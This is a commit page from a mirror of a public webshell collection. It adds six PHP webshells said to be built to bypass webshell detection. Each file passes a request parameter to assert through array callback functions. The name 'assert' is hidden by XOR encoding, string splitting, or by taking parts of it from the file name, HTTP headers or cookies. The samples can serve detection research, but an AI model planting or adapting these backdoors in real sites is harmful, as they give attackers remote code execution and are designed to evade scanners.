mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
Add files via upload
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
This commit is contained in:
parent
1ee6e0dd74
commit
32be5d26bf
6 changed files with 49 additions and 0 deletions
|
@ -0,0 +1,7 @@
|
|||
<?php
|
||||
$password = "LandGrey";
|
||||
$key = substr(__FILE__,-5,-4);
|
||||
${"LandGrey"} = $key."Land!";
|
||||
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
|
||||
array_intersect_uassoc (array($_REQUEST[$password] => ""), array(1), $f);
|
||||
?>
|
7
php/array_intersect_uassoc-headers-accept-r.php
Normal file
7
php/array_intersect_uassoc-headers-accept-r.php
Normal file
|
@ -0,0 +1,7 @@
|
|||
<?php
|
||||
$password = "LandGrey";
|
||||
$key = substr(__FILE__,-5,-4);
|
||||
${"LandGrey"} = $_SERVER["HTTP_ACCEPT"]."Land!";
|
||||
$f = pack("H*", "13"."3f120b1655") ^ $LandGrey;
|
||||
array_intersect_uassoc(array($_REQUEST[$password] => ""), array(1), $f);
|
||||
?>
|
9
php/array_intersect_ukey-cookie-ass.php
Normal file
9
php/array_intersect_ukey-cookie-ass.php
Normal file
|
@ -0,0 +1,9 @@
|
|||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
$ch = $_COOKIE["set-domain-name"];
|
||||
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch."ert");
|
||||
?>
|
9
php/array_intersect_ukey.php
Normal file
9
php/array_intersect_ukey.php
Normal file
|
@ -0,0 +1,9 @@
|
|||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
$ch = explode(".","hello.ass.world.er.t");
|
||||
array_intersect_ukey(array($_REQUEST[$password] => 1), array(1), $ch[1].$ch[3].$ch[4]);
|
||||
?>
|
8
php/array_udiff_assoc.php
Normal file
8
php/array_udiff_assoc.php
Normal file
|
@ -0,0 +1,8 @@
|
|||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
|
||||
?>
|
9
php/forward_static_call_array-referer-ass.php
Normal file
9
php/forward_static_call_array-referer-ass.php
Normal file
|
@ -0,0 +1,9 @@
|
|||
<?php
|
||||
/**
|
||||
* Noticed: (PHP 5 >= 5.3.0, PHP 7)
|
||||
*
|
||||
*/
|
||||
$password = "LandGrey";
|
||||
$wx = substr($_SERVER["HTTP_REFERER"],-7,-4);
|
||||
forward_static_call_array($wx."ert", array($_REQUEST[$password]));
|
||||
?>
|
Loading…
Reference in a new issue